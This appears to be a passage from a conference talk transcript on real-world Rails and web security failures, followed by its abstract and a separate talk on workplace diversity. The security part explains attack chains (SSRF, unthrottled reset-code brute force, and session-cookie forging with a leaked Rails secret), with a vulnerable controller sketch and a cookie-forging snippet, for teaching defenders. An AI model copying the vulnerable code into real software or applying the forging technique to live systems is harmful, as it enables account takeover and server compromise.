But as the researchers were cracking them, if they found a hash that worked, then they would just try a few iterations of different capitalization, and they could pretty much get it fairly quickly. And then they compared those to make sure they could calculate the bcrypt hash, and so they could be like, yeah, these are actually the passwords. So don't use weak hashing algorithms. I know this example with the picture is not actually a hashing algorithm, but it's the idea, right? You're trying to hide something, and you kind of feel like you hid it, but you didn't really. So just avoid using MD5, avoid using SHA-1, use SHA-256 for this kind of thing. Well, not for passwords, but for things other than passwords. All right, Facebook. This one will be really quick. So you want to reset or you forgot your password on Facebook. So you go in and they say, OK, we're going to send you a six-digit code. You type in the code, we'll reset your password. Or actually, I don't know what happens after that, but we'll get you into your account. So six digits, how many possibilities is that? Yes, very quick, one million. So that's actually a reasonable number to just try all of them. So a researcher, just to let you know, for bug bounty and probably other security researchers, the forgot password flow is often a weak point in websites, because you're basically saying, I don't know the true credentials that I should be using to get into your site, so give me some other way to get in. And a lot of times, there's flaws in that. So he's looking at this and he hit it, and I don't know how many times he hit it, but it was rate limited. So he's like, well, OK, that's expected. But then he went over to another site that he happened to know about, which was Facebook's beta site. Well, it just happens to turn out that they did not have rate limiting on that site. So essentially, for any account that he knew, the username, email, or phone number, he could get into their account, because he just requests the code. It doesn't matter what the code was — wherever that went, it doesn't really matter. And then you just sit there trying at most a million times in the absolute worst case, which you could do relatively quickly, especially compared to trying to brute force a password. So in this case, it's just straight up missing rate limit. Should have been a rate limit, there wasn't one. And interestingly, this is probably the simplest of all these examples, and yet he got the most money because the impact is, well, gee, I can get into anyone's Facebook account. So does anyone know how to pronounce this? I say "imager", I don't know. So Imgur — you upload photos or whatever, and people look at them and comment and upvote or whatever. I'm saying that very casually, but I spend a lot of time on this site. Anyhow, they have this functionality where you can give them a URL to a video, and then they convert it to a GIF. And then you can show it on the site, right? So a researcher was looking at this, he noticed how it works. It hits some endpoint, and it passes in a URL. And then it goes and fetches that URL, of course. I mean, it's pretty simple functionality. Something like this. 
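(The diagram isn't in the transcript, but the shape of the vulnerable endpoint is roughly this — a sketch, not Imgur's actual code; the real backend used libcurl, which speaks far more protocols than Ruby's open-uri does.)

```ruby
require 'open-uri'

# DANGEROUS sketch: the server fetches whatever URL the client supplies,
# with nothing restricting where that request is allowed to go.
class GifConversionsController < ApplicationController
  def create
    video_data = URI.open(params[:url]).read
    # ... hand video_data to a (hypothetical) conversion job ...
    head :accepted
  end
end
```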
So you give Imgur a URL, and then it hits it, like maybe bit.ly or something. And this is called server side request forgery, because you're basically asking a server, like Imgur's servers, to go and make a request to another server, essentially on your behalf. And you can use this for things like denial of service attacks, or any kind of attack where you'd like to hide behind someone else, or maybe they have way more bandwidth than you do, or maybe they have a trust relationship between the servers that you don't have. But that's not exactly what this is about. So the researcher was like, what if I changed that? What if instead of HTTP, I use SFTP? And I'll just set up a server, not bit.ly, but I'll set up some server where I can see the request that comes into my server, and just see what happens. So he set up, using netcat — he's like, just listen on this port, see what comes in. One of the things that came in was, hey, I'm coming to do my SFTP or whatever. The string that comes in is like, oh, I'm libcurl, and this is my version number. That's pretty useful information. And so what he did was he basically started trying all these different protocols, and essentially Imgur would just — whatever you gave it, it would just go and do. And I didn't go through the whole example, because from a security point of view it's not that interesting, but if you go read the post, which again I linked, and of course the slides will be available, he set up a server that it would hit with, I think it hit it with SFTP, but then he redirected them to a gopher URL, and tricked them into sending an SMTP request to another server. So he was actually using them to send mail through, I think it was mail.ru. So it's just kind of an overcomplicated example of what you could do with it. The main thing is you can make these requests and essentially use them as a proxy. He got $2,000 for that. I don't think I put the slide in, but basically if you're not expecting to make these kinds of requests, you should be checking that you're not making these kinds of requests. So he got $2,000 for that. 
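(Since there's no fix slide, here's a hedged sketch of the kind of check he means — validate a user-supplied URL before the server will touch it. Real deployments usually also pin the resolved IP for the actual request, re-check redirects, and set timeouts.)

```ruby
require 'uri'
require 'ipaddr'
require 'resolv'

# Loopback, RFC 1918 and link-local ranges we never want the server to hit.
PRIVATE_RANGES = %w[
  127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 169.254.0.0/16
].map { |cidr| IPAddr.new(cidr) }

def safe_remote_url?(raw)
  uri = URI.parse(raw)
  return false unless %w[http https].include?(uri.scheme) # no gopher://, sftp://, file://...
  return false if uri.host.nil?

  address = IPAddr.new(Resolv.getaddress(uri.host))        # resolve and inspect the target
  PRIVATE_RANGES.none? { |range| range.include?(address) }
rescue URI::InvalidURIError, Resolv::ResolvError, IPAddr::InvalidAddressError
  false
end

safe_remote_url?("https://example.com/video.mp4") # => true
safe_remote_url?("gopher://evil.example:70/")     # => false (scheme not allowed)
safe_remote_url?("http://169.254.169.254/")       # => false (link-local metadata address)
```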
So he finds the secret token, and honestly, like, is it bad that this is here? Yes. But probably the point to take away here is that if you're using an open source Rails application somewhere in your infrastructure, you should go and change this value, right? Okay. So he sees this, he's like, well, that's pretty good. And also, this is running Rails 3.2.14, which is, I believe, from 2013. So pretty old. And he does some more research, it doesn't really matter, because we know in this room that in Rails 3.2.14 the session cookie is signed, but it's code that has literally been marshaled to a string. But it's signed. And usually the signed part is kind of what keeps us safe, but he has the signing key. And when you unmarshal code, it's possible to execute code. If you've been around for a couple years, you probably remember 2013. So session cookie signed, marshaled code, and if you have the signing key, you essentially have remote code execution. Now if you read his blog post, I actually got a little confused, because the exploit he used was for Rails 3.2.11 — no, no, 3.2.10 — which was supposed to be fixed in 3.2.11, but then he used it on 3.2.14, so I have no idea what that means, but I'm just letting you know. But in any case, however he did it, he was able to create a forged session, the server accepted it because he signed it with the correct key, they hadn't changed it from the open source repo, and he got a remote shell on the box. So at this point, like, honestly, he was done. And again, I'm not talking about the drama, but this is where it begins. So he has the remote shell, that's awesome. But what can he do? So he decides, well, there's a database for the web server, I'll just connect to it through my shell and see what's there. And what is there? Passwords are there. That's awesome. However, they're bcrypted, okay. Now there isn't like an MD5 bypass this time, instead what happens is he's like, well, whatever, like, I'll try cracking them anyway. You know, long shot, but I'll just try it. Well, like jackpot. So six of the passwords were just change me, so probably someone set up an account for someone and then they never changed their password. Three of them were the same as the username, two of them were just the word password and one was the word Instagram, which makes me believe probably when he set up his cracking tool he seeded it with some of this information, right? So that's bad. He logged in just to show that he could, but then he's like, this isn't actually that interesting as a web app. He was talking about like, well, maybe I could like set off some PagerDuty alerts, but you know, not that interesting as an attacker. So then he starts poking around and he notices on that box, there are keys for AWS. And then so he goes to that box and on that box, there are more keys to other S3 buckets. And then he starts looking around and again, not talking about the drama, but you can see where some drama would come from. He starts seeing like, wow, there's like tons of stuff. Anything you could kind of imagine I can probably access. So this is all from using an open source Rails app that had the secret token in the source code. Yeah, secret in the source code, really old version of Rails. There were weak passwords, which he didn't use for anything except for logging in, but weak passwords. And then the keys were sitting on the servers, which like how you solve that, like I think that's like the worst or the least bad thing on this list, really. So he got $2500.
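Conceptually, the signed-cookie piece of that chain works something like this — a sketch using ActiveSupport directly, just to show why holding the signing key is game over; it is not the researcher's actual exploit:

  require "active_support"
  require "active_support/message_verifier"

  # Rails 3.x stores the session as a Marshal dump of the session hash,
  # signed (not encrypted) with the app's secret token.
  leaked_secret = "the value found in secret_token.rb"
  verifier = ActiveSupport::MessageVerifier.new(leaked_secret, serializer: Marshal)

  # Anyone holding the secret can generate a payload the server will accept...
  forged_cookie = verifier.generate({ "session_id" => "anything" })

  # ...and because verification Marshal-loads the payload, a crafted object
  # graph can lead to code execution when it is unmarshaled.
  verifier.verify(forged_cookie)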
I don't know if it was worth the drama that he went through. Again you can read that on the Internet. All right, so just to kind of summarize here of like, I'm sorry, it's kind of off to the side, but things you should do. Okay, so verify that the current user can do the thing that they're asking to do, that they can access the data they're asking to access. And I want to point out that like this is not just like from the web browser necessarily. If you're in like a service-oriented architecture, you got to think about that too. Because again, think about who you're trusting. Think about who they're trusting. And never trust the client. So think about those trust relationships. Always try to use strong hashing algorithms. And I know like there's a strong temptation when you're like, well, this doesn't really matter. Like I'm just using it for this or like I'm not really hashing their password or something along those lines. You can use SHA-256. It's like super fast and strong. So just use that. For important actions like logging in, confirming codes, any kind of action that is either someone can brute force something or even if it just causes you financial loss, put a rate limit on it. Don't put your secrets in your source code. And it's kind of a hard thing because you're like, well, but my source code's right here. And then like, well, where do I put my secrets and so on? But the thing is, if you have someone steal your source code, which happens because it happened to Ashley Madison, you don't want to have your secrets right there in the code. And certainly don't put them on GitHub, which it happens like all the time. So if you just don't have them in your source code, it's just not a problem. And then finally, I know it seems like such generic security advice, like always use strong passwords, but think about when you're at work and they're like, oh, we just set up this admin panel and here's a password or whatever. What if that admin panel ends up on the internet? You don't want to be the person who's using the password password. You're not going to feel good when your security team comes to you and says, by the way, someone just logged in with your account and your password was password. It's not a good time. Okay. People always ask about resources. I know people are asking Mike. He probably actually knows better. But if you're totally new to web vulnerabilities, check out the OWASP Top 10. It is a good list. It's a very good reference. If you're looking for what should I do as opposed to what should I not do, there's a new OWASP Top 10 of Proactive Security Controls, which sounds very formal, but actually the documentation, it's very good to go through. It tells you things like think about who you trust and protect stuff and encrypt stuff. It's just kind of like a good checklist to go through. If you're looking for like hands-on, trying stuff out, the last two are actually from nVisium. RailsGoat is an OWASP project. It's like a purposely vulnerable Rails application, but it also gives you hints of like, maybe you should try this or that. If you really want to, it will walk you through things. It's a good resource. And then also nVisium has these SecCasts, which you do have to sign up for, but they're free. And they're a pretty good resource for Rails security and security in general, both on sort of defending against things and also trying to hack into stuff. All right. Okay. Made this slide. So like, I believe almost everyone at this conference is packing stickers to give away.
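A couple of those recommendations in code form, as hedged sketches rather than drop-in config — Rack::Attack is one common way to get rate limiting in a Rails app, and the paths and limits here are just illustrative:

  require "digest"

  # Strong, fast hashing for non-password data (passwords still get bcrypt or argon2):
  Digest::SHA256.hexdigest("whatever you are fingerprinting")

  # Rate limiting a sensitive action with the rack-attack gem,
  # e.g. in config/initializers/rack_attack.rb:
  class Rack::Attack
    # At most 5 login POSTs per IP per minute -- the numbers are made up.
    throttle("logins/ip", limit: 5, period: 60) do |req|
      req.ip if req.path == "/sessions" && req.post?
    end
  end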
So if you would like one of these three, I have them with me. After the next talk, we're going to have a security birds of a feather. I don't know where the, does anyone know where those are? Oh, the lunchroom? Okay. So. Okay. Great. So it's in the lunchroom zone A right after the next talk. So if you want to come and talk to us about more of this stuff. And if you live in the San Francisco Bay area, well, not if you live there, but if your company lives there, feel free to contact me if you want me to come and talk at your company. I'm happy to do that. And this is where you can find me on the Internet. Thank you. And yeah, so the question is, aren't those bug bounty payouts kind of low? And there's like, I can talk forever about bug bounties because it's a hard thing. Like what are things worth? And I mean, yeah, maybe you think it's low. Maybe they think it's high. You have to also consider like what's their budget for bug bounties? Of course, Facebook has a ton of money. And yeah, I mean, the guy, the other guy that did the Instagram thing, his whole thing was like, they should have paid me like a million dollars for this. So yeah, it's tough, honestly, because I've been a part of a couple bug bounty programs on the like receiving side. And it's very hard to think through like what's this worth, how much do we pay, how does it compare to other things that we've seen. And I mean, the thing is like, well, this could destroy our business. Can you really go to your finance department and be like, we'd like to pay them like half a million dollars. Like no one's going to go for that, right? Even if it could have wiped out their whole business. So yeah, so the question is, where do you put your secrets? Because someone has to actually use them at some point. I mean, there are products that will do it for you. Essentially, you want to store them somewhere and make sure that only the servers that actually need certain keys get those keys. That's basically the best you can do. And then you protect that store of keys. And the nice thing though is if you automate all that, then you can rotate them really easily, which is nice. But yeah, you basically just, you know, you got to put them somewhere and then make sure they're encrypted there and then make sure they only go to the boxes that need them and that access to that, you know, like you don't want someone using the Rails CVE that Mike mentioned to read those files if you can help it. Yeah, so the question is, even when you're doing it that way, like how do you securely transfer them between servers? I mean, I got to say, at some point you reach a point where you're like, okay, it's safe enough, you know, because really the main thing is them sitting on servers where they shouldn't be or being too widely available. You don't want everyone in your company to have access to the main keys. Of course, when you are transferring them, I mean, you could just use SCP or something and you'd have key lists. I mean, you'd be using SSH keys on the servers. Yeah. Or I mean, if you want, you can encrypt them and send them over SSH and decrypt them on the box. I mean, you know, but then you have, like you said, the next level, like, well, but then we have to share the key to decrypt it. And yeah. Yeah. Like I said, there are like kind of commercial solutions. There are also open source solutions, actually, you can look into. But yeah, honestly, it's just a hard problem. 
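For what it's worth, the baseline version of "keep them out of the source code" is just pulling keys from the environment (or from a secrets store that populates the environment) at boot — a sketch, assuming the aws-sdk gem and made-up variable names:

  # config/initializers/aws.rb
  Aws.config.update(
    credentials: Aws::Credentials.new(
      ENV.fetch("AWS_ACCESS_KEY_ID"),
      ENV.fetch("AWS_SECRET_ACCESS_KEY")
    )
  )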
I think you just have to get to one where you're like, this is not our weakest point anymore. There's a question over here. I thought, no. Okay. All right. Well, thank you very much. I'll take it.
|
Rails comes with protection against SQL injection, cross site scripting, and cross site request forgery. It provides strong parameters and encrypted session cookies out of the box. What else is there to worry about? Unfortunately, security does not stop at the well-known vulnerabilities and even the most secure web framework cannot save you from everything. Let's take a deep dive into real world examples of security gone wrong!
|
10.5446/31494 (DOI)
|
What do you say we get started? I was like, okay, cool. Hey, I'm Tony, via Chorek. I'm here to talk today about practical ways to advocate for diversity at work. I've been A.B. testing the title of this talk, so sometimes I call it straight white men should advocate for diversity at work. Like any good A.B. test, I only had very few sample size, so it's been accepted in both ways. But I think diversity is something that we should all care about, not just people of color and women. It's very important for our businesses. So I'll talk today about why I think that. So here's my husband and I, my husband's in the front row right here, at Chicago O'Hare International Airport. Does anybody recognize the guy with the arrow pointing to him? Yes, I heard Santorum. That's Pennsylvania Senator Rick Santorum, who is particularly vitriolic and hateful in his speech, right? Before Trump was Trump, he was Trump. And we do what you do at an airport, which is you grab your Starbucks or your coffee, and you wander in a haze at the airport. You find a seat next to someone, you sit down, and we just happen to sit down next to Santorum. And he was giving a radio interview on the phone. So I don't know to who. But he was being really hateful that day, saying things about gay families with an earshot of my husband and I and our nephews, saying how we're destroying America, that women's place is in the home. I mean, all these really ridiculous things. And I'm just getting angrier and angrier. I'm getting angry just talking about it, thinking about it right now. And I wait for him to finish, and he gets off the phone and I say, how dare you? Like, I walk off to him, right behind me. How dare you talk about me and my family that way? We're not destroying America. We're not hurting you. I'm an American just like you are. Why are you talking about us this way? He gives me a very political answer. He says, thanks for your vote and gives me a thumbs up, which only makes me more and more mad. He starts walking away, and I notice the people around us have gotten up and are moving away from us. They're afraid of what's going to happen. They're not going to be able to get on their flight. They're scared of what we might do. So I, in a moment of anger, I remind him of the meme, the internet meme, that made his name so very, very famous. Don't look it up right now. And I like to think that that got him. I don't know. We'll see. But I like telling the story because this is the kind of America that I live in. A lot of people live in, right? Boston, Massachusetts right now. Very progressive city in a very, very liberal state. We had marriage equality way before. A lot of other states did. And we're constantly on the forefront of social issues. But I travel and I meet people like Santorum and in the airport randomly. I turn on the television and I hear Trump talking about families, about people that I care about in certain ways. It's awful. So how much more awful do you think it would be to have this in your day life and then go to work and hear the same kinds of jokes? Maybe not quite in such a hateful way, but they constantly dig at you day after day, right? That's the experience a lot of people of color and women have at work and during culture. And I want to change that. So this is my attempt at doing that. A little bit about me. I went to undergraduate school at WPI in Worcester, Massachusetts. And then went to graduate school at Tufts. All right. So I got my graduate degree from Tufts University in engineering management. 
I interned at NASA in high school. My first job out of college was at the Free Software Foundation, where I was the personal assistant for Richard Stallman. So after they just come talk to me, I have lots of great stories about that. And then I really got my education in engineering from Zipcar, where I was for four and a half years. How many people here have driven in a Zipcar or knows what it is? Okay. Good. You've used my software. It's great. I was there while we were growing. I was one of the first eight engineers, a small team there. And then we grew to 50 engineers. We acquired two companies. We went IPO, and then we ourselves were acquired by Avis all in that time that I was there. And I learned a lot about engineering at Zipcar. Currently, I work at a company called LocalLytics. We build software that's in all of your phones right now. It's an SDK that companies can install to see what users in aggregate are doing in their apps to build better apps, build better features. We work with companies from the New York Times to HBO, SoundCloud, and our software is installed in over two and a half billion with a B, devices around the world, processing terabyte to data a day coming into our systems. And we work across Ruby, Scala, JavaScript, and a few other languages. And I manage a team of 11 engineers who are across all those languages there. And I hire a lot for our company. And I found that the single biggest challenge of building a company, especially in Boston, is hiring the best people. And everyone says this, right? But what's that word best? That's the word I want to concentrate on. And for me, best means hiring a diverse workforce. People from different educational backgrounds, people of different genders, people of different colors, races, ethnicities. And I think that way... Here's a demonstration of why I think that way. Kate Hedlston has this fantastic series of blogs where she talks about this, that the productivity of your team is a product of how well they work together and the sum of the individual talent of the team. I think all too often engineering groups focus just on the sum of the talent part of that. They talk about 10x engineers, and that's why they talk about it that way. But I like talking, as other people do, about 10x teams. And this is why, right? The better the team works together, the more productivity I'm going to get out of everyone. And for me, a diverse team is a team that works better together, and there's research that backs this up. Here's some research from the Scientific American that teams... Diverse teams prepare better, anticipate alternative viewpoints, and they know that reaching consensus is going to take work to achieve. That to me is the process of developing a product of engineers getting together to build software that helps people and helps companies build better apps. That's the essence of why diversity for me is important. But I mentioned I manage 11 engineers, right? And that means every week I have a 30-minute 101 with each one of them, where I give them on the right, I try to give them, and here's one of them, he's right in the front row too, so tell me if I don't do this for you, but give you clear, frequent, and tough feedback. That's how you grow as an engineer, but the way that you're going to best receive that is if you also believe that I care about you as a person. I'm not just telling you that tough feedback because you're replaceable, and if you don't achieve that, I can replace the cognitive machine, right? 
I mean, that's a lot of engineering departments operate that way, or people feel like they do. So I celebrate everyone on my team as a whole and diverse person. Does that make sense to people? Yeah, okay. I want to lead you through five ways that I've found or practical ways you can advocate at work for diversity. Measure, fund, raise, call out, and recruit. And I'll preface this by saying I'm not an expert in this. I wanted to share my experiences because that's how I think we all learn better that way. I work for a company who's one of our major products is analytics. We tell people what you do in their apps, and so I'm used to using data to make the problem clear. You can see at the top, the gray bars at the top is the US population distribution. This is from a few years ago. And how the major tech companies in America are lined up with those gender and ethnic distributions. So you can see the gender distribution, we know that it's not a secret, right? That the gender distribution in all of our companies is out of whack. As are the representation of Latino and Black employees, especially. And companies these days from Google, Yahoo, Pinterest, Etsy, right, they released their gender and ethnicity breakdowns. So I said, oh, this is great. I want to do this at Localytics. But our company is 250 people, nowhere near the size where we have an HR department who knows how to conduct a survey. How do I conduct a survey with some really sensitive questions in it, right? Where are some techniques I couldn't really find a lot of information? So I pieced together a survey for our company and I open sourced it so people can run these kinds of surveys at their own companies. Our first decision was how do we ask people what ethnicity and race you are? It's a very complex question. A lot of people identify as many of these or several of these. And it's also a very personal question. So we settled on a government form called the EEO-1, very official sounding, right? But any company of a certain size has to fill this form out of their employee makeup. And we thought that using the same categorizations for ethnicity and race would give us at least a benchmark that we could use. We also wanted to be cognizant that people identify as in gender in different ways, right? So we wanted to not have it be a binary choice and have it be a right in field, but people identify however they wanted. On the back end, when we got the data in an anonymized fashion, this did mean we had to massage the data a little bit, right? And because people would put an M when they meant male, so we had to assume and guess what they meant. But it turned out not to be a big deal. And because we're only 250 people, we didn't, and we wanted to release the data in an anonymous fashion, we didn't want to have it be super identifiable. We didn't want people to look at it and say, oh, I guess that's that person answering that question. And so when it came to GLBT affiliation, we chose just do you identify with any of these terms or not. Because we thought if we dove down into it, it would be too identifying. I really wish that this next slide that I showed you was a result of how we're doing awesome, right? How the gender breakdown of locality is world-class, matches the U.S. population, same thing for ethnicity, and unfortunately that's not the case. We look just like this slide from Google. 
We suffer, we struggle with the same problems a lot of companies do, except we're trying to do something about it, and that's really what this talks about. But I feel like at a tech conference I should show, okay, here's the result we got, right? We're spectacular for this reason. We also, we fund local groups at Localitics in an effort to raise awareness for it. I'm used to getting in my inbox every week, Ruby Weekly, D.B. Weekly. Anybody subscribe to these like weekly tech email newsletters? There wasn't one for diversity that I found. There's Model View Culture, which is a fantastic publication. I think they're actually print and online. But what I started was diversityhackers.com. This is every Tuesday morning, you sign up, you go to diversityhackers.com. I will send you a curated list of five articles from that week. That week's news in diversity, practical tips that you can use in your company, how other companies are pushing this problem. We recently were sponsored by Buffer, the social media app. They wrote about us on their blog. So it's been growing every week. I encourage all of you to sign up for it and give me some feedback of what kind of articles you want to hear about. So we also support local women's groups in Boston. This one is called She Geeks Out. You can see on the bottom right there we made little shot glasses for everyone to take home. We bought dinner for this group. It's about 150 women. This is the offices, our old offices in Boston. They showed up and we had a speaker present. On the left, that's Sarah Rakowitz. She was the senior product manager at Localytics. She talked about techniques to build a product and how we build it at Localytics. On the right, that's Diane Hessen. She's the CEO of the Startup Institute. She talked about founding your own company as a woman, especially in Boston, techniques and trips that she's found. It was a feel-good event. Everyone had a great time. We had some fantastic barbecue. Although now I'm in Kansas City, I can't really compare, I guess. More than just a feel-good event, I put my recruiter hat on and I said that was 150 women who came into our offices, saw what it was like to work at Localytics, and we got several warm leads of people reaching out to us afterwards saying, how can I come work for your company? That to me, if I'm not doing that every week, I'm not doing my job as a manager, really, encouraging people to come work for our company. Another thing I tried was starting my own monthly meetup in Boston. There weren't any groups for gay engineers, LGBT engineers to meet up, so I started one called Code Pride. Again, if I don't hear this from people about Localytics, that I was interested in Localytics before, but I'm way more excited now that you host Code Pride, that's part of my job as an engineering manager is to want people to want to work for us. Another practical way that you can advocate for diversity is by letting other people know that it's important to you. I started at Localytics about a year and a half ago, and the second week on the job, I didn't know anybody. They bussed us all two hours away from Boston to a casino for an offsite, a company offsite for three days. Very, very nervous, and the whole thing started off with a three-hour event where the CEO laid out the vision for the company for the next three years, and then we had an open question and answer period. So you can imagine all 250 people in a room, people are sort of lobbing softballs at the CEO. 
That's what you do in a big company organization like that. And then I let a few people ask some questions, and then I ask the CEO, what are you doing to increase diversity among the management at Localytics and among the companies as a whole? And I don't think he was expecting that kind of question. He's a person of colour himself. He's of Indian descent. So we said, obviously I care personally about this issue, and it's important for our company to hire a diverse workforce, but then he did something very unexpected. He turned the microphone back on me and said, Tony, what are you going to do about it? And I paused, and I stammered my way through an answer, and I said, you know what, that's... Raj, thanks for giving me that opportunity. He did what all good leaders do, which is... He didn't have an answer, but he wanted me to take leadership position at Localytics to show them how diversity could be different here at the company. It was nerve-wracking, I got to tell you, and it probably would be for a lot of people in this room to stand up and say, like, this is important to me, especially in front of the whole company, but the best leaders, the companies you want to work for, the companies that accept that and want to help you change the culture. But it's also important to talk about this because the perception among engineers is not equal to the reality that a lot of women and people of colour face. This is research from Lean In, Cheryl Sandberg's Foundation. 72% of men responded that they think women have the same opportunities as men in the workplace. This doesn't sound right, right, because women on the whole in the United States make less than men. What I was surprising to me is that 16% of people said they have more opportunities than men. We hear this daily from engineers who are leaving, not just leaving your company, but leaving the industry as a whole. There's a problem here, and there's a perception gap. So it's important that you talk about this to your fellow engineers and to your management, that this is a problem. An easy way that you could raise awareness for diversity at work is something like your conference room names. We recently moved to a brand new beautiful office in downtown Boston that was built out specifically for our company. So we had to rename all the conference rooms. What an easy opportunity for us to name them after women and LGBT engineers who made a fantastic contribution to the industry. These are names familiar to a lot of us here, Margaret Hamilton, Grace Hopper, Alan Turing. But think about other departments who also book these conference rooms who don't know who these people are. Every time they book a conference in Grace Hopper, it's an opportunity to talk about why she's important to our industry and to engineering in general. You can even include it in the description of the room name. I mean, it's not hard to sort of subtly reinforce that people of all stripes and colors and backgrounds are accepted here at Localytics. So another thing that happens at work is people tell jokes, or they say things that make people feel uncomfortable. And so I can talk through some techniques I use to call that out when I hear that happen at work. Growing up, I thought mayonnaise came with tuna fish in the jar. I'm the oldest of six kids. We grew up in a small house in Baltimore City. Tuna fish sandwiches were a popular snack of ours. So we would get out the can of tuna fish, get out the mayonnaise, put it between two slices of bread. 
And I thought, why do I have to make this when the mayonnaise jar comes with tuna fish inside the jar already? And of course it doesn't, right? But that's because the laziness of my brothers and sisters and I, that every time we would double dip and add more mayonnaise, we would leave tuna fish behind in the jar, okay? What a great metaphor for our engineering cultures. The things that seem like that's, oh, they've always been that way, or that's how it has to be, right? It's actually a result of people not explaining their worldview or being lazy about certain things, right? When I was making the slide, you can't find a stock photo of tuna fish in a mayonnaise jar, so I had a little photo shoot. And I bought a jar of mayonnaise and I bought some tuna fish, and my husband had this disgusted look on his face as I was doing it. It's kind of gross, right? And I said, good, we should all be so disgusted at the current state of our engineering culture when it comes to diversity. How many people are familiar with this tool, this SBI tool? Anybody heard this before? One person, two people, three of them. It's a technique when talking about sensitive subjects, or subjects that people can get really offended at or defensive with, giving them feedback in a way that still makes you heard. So there's this thing that happened at work where we have a pull-up bar, you know, like you can do pull-ups on it, which is a very macho thing in the first place. Probably doesn't have any room in our company anymore, but a couple of people from a different department came over, and it was right next to my desk, and they started doing pull-ups, and then they, you know, based on where their bodies were positioned, they made a joke that I took as offensive towards gay people. And I'm out at work, you know, it's not a secret, and I know that they know better than to say those kinds of things at work. But it could be, you know, it's, it could be hard to speak up and say that that was not an okay joke to say. So the technique I use is, you know, 20 minutes ago when you were at the pull-up bar, I overheard a joke about gay people that made me feel really embarrassed for you and didn't make me feel good about working here. Do you mind not saying those kinds of jokes at work? So that's two sentences, and when I did that first sentence was talk about a specific situation. I didn't call them out as homophobic. I said, 20 minutes ago, at the pull-up bar, a specific situation, the behavior I witnessed was you told a joke, and here's what the joke was, and the impact on it, the impact it had on me. And that has a way of defusing the situation, so I didn't call them homophobic, it's not defensive, they can't really argue with the facts. Especially they can't really argue with how it made me feel. And I provided them what I wanted them to do, which was stop telling those kinds of jokes at work. This tool, I encourage you to read more about it. If you're interested, it's from the Center for Creative Leadership. They have a little booklet on it that you can practice, and it's a great tool for giving general purpose feedback that might be hard to give. And finally, recruiting and retaining the best employees. This was from a few months ago, the front page, top article of the Boston Globe, shortage of tech workers worries mass companies. How many of you have trouble hiring people? Yeah. Right? There's a lot of jobs, a lot of qualified people out there. 
There's a culture of switching jobs often, so you want to attract and retain the best talent. And I mentioned earlier how some women aren't just leaving your company sometimes when they hear these jokes, or they feel that they're not really welcome. They're leaving the entire industry, and that's a shame. I want to do everything I can to attract the best talent to come work at localitics. You know, and I hear some, sometimes people talk about, Tony, we obviously want more women, we want more people of color to work here, but we don't want to lower the bar. How many people have heard that before? This notion that there's a bar, that you don't want to lower for other people. Etsy, actually, there's this fantastic metaphor that they have for this, where they say people are like potatoes. We all have areas of us that are more well rounded than other areas, maybe some technologies where we have a divot like the eye of the potato. We have this shape about us, right? It's not about a line. We're not throwing that potato over a bar. We're hiring the entire potato, the entire person. And so I would much rather take a candidate, offer them a position, a candidate who maybe didn't do as well on our coding test or as well in our whiteboard test, but has a proven track record of leading teams through quick iteration and being a visionary leader on their team. That person to me is much more valuable than a so-called rock star, a superstar, who is used to only working by themselves. A funny thing happens when you start talking about diversity at work. You get emails like this two months ago from a female co-worker of mine. Below is the perfect example of patronization in the workplace. This is from a male co-worker of hers who had given her a to-do list about a job that she had already been doing for many, many months. Somebody who felt like she wasn't doing according to him what she should be. And she said, you know, how patronizing is that to get a to-do list of what you should do every day? And so this was an opportunity, we talked in person about this too. This was an opportunity for me to go teach her about the SBI tool and say, well, here's my technique. Whenever I get an email like this, here's how I approach it, and here's maybe, here's a tool set, some things you can do and try with this person. But it's difficult. I get people a few times a month, send me emails like this or pull me aside and say, this just happened. What can I do about it? And sometimes all people want is a sympathetic ear, somebody to listen to and talk to about it. Do you have a question? Yeah. Absolutely. Yeah, there's about 10 minutes at the end for questions. If I can just finish, is that okay? And then we can talk about that. Sounds good. And finally, you can work with your HR departments to provide inclusive healthcare, trans-inclusive healthcare, generous OBGYN, and paternity and maternity leave. And by the way, these things aren't just for the people that they directly affect, right? It's not just for women who are currently having a baby. It's also a signal to people that it's okay to have a work-life balance here at Localytics or My Company, right? It's okay to want to have a family. We want you here. And we're signaling that by giving you as much time as you need after you have a kid, right, to bond with them. So we've talked about five ways today, measure, fund, raise, call out, and recruit to advocate for diversity. 
And I want to leave you with a few thoughts, that a lot of people think about diversity efforts like this. Like, it's a binary thing. Either I'm fantastic at it, I'm on, or I'm not good at it, so I shouldn't even try. I'm off, right? We're engineers. This is a way a lot of us think, myself included, sometimes about things that if I'm not, if I can't be the best at it, I'm not going to try. But I want to encourage you to use some of the tactics we talked about today to think more about your diversity journey like this. That over time, you'll have low points and you'll have high points. Maybe a low point is you didn't call out speech that was derogatory. Or you said a joke yourself. You slipped up and you said something you probably shouldn't have. The next day, maybe you talk through it with your team and you apologize. Or the next time you hear that speech or that behavior in a meeting, you call it out. But over time, you're getting better at it, right? I love Neil deGrasse Tyson. He has this quote, I love being wrong because that means in that instant I learned something new that day. And I have this in my head every time I try to talk about diversity at work. What we've really talked about today is an agile or iterative approach to being an ally for diversity. Okay, back to the airplane real quick. I did get on the flight. I was not kicked off, thank goodness. And in that great equalizer of American society, both Senator Santorum and I and my husband were all three seated in coach together. Luckily not in the same row or near each other. But we land in Omaha, Nebraska legally unmarried. We left Boston married, legally unmarried in Omaha, Nebraska. And it's something that's on our mind. If I went to the hospital here, would we have as many rights as we do in Boston? No, we wouldn't. And you can't make this up. That very same weekend was the weekend that the Supreme Court handed down the ruling that legalized our marriage in Omaha. We left Omaha that weekend married again. It was a great feeling, right? I'm a full citizen. I finally felt like a full American for the first time in my life. Things can change. We can change our cultures. All it takes is people like you and me to try. Thank you. So the question was in this case, the to-do list coming off as patronizing, how did I work with the individual in this scenario? Both individuals? Yeah. Yeah, I mean, like everything in life, this is a super complicated example because the person in question was senior to me even. And I don't look at this like I need to go solve it. It's not my, sorry, that it's not, I don't look at this like it's my problem to solve necessarily because that's also a way of patronizing. Like, oh, you can't solve it yourself. I'm the man. I'll step in and solve it for you. I'm sensitive to that. I don't want to have that come across that way. So this particular employee and I had a conversation about that SBI tool and practiced it with her. It's one of those things that you can help somebody practice on you as an ally, somebody who won't judge them for wanting to feel this way. And honestly, I think it helped her to hear from somebody, you know, I'm a manager at work. I deal with some of these issues sometimes. It helped her to hear that her feelings were valid and yes, I do think that this was a case where that he had some, he could have worked on how he communicated to her. My approach for her was not to do a reply email but to go talk to the person and, you know, face to face because a lot's lost in that translation. Yes.
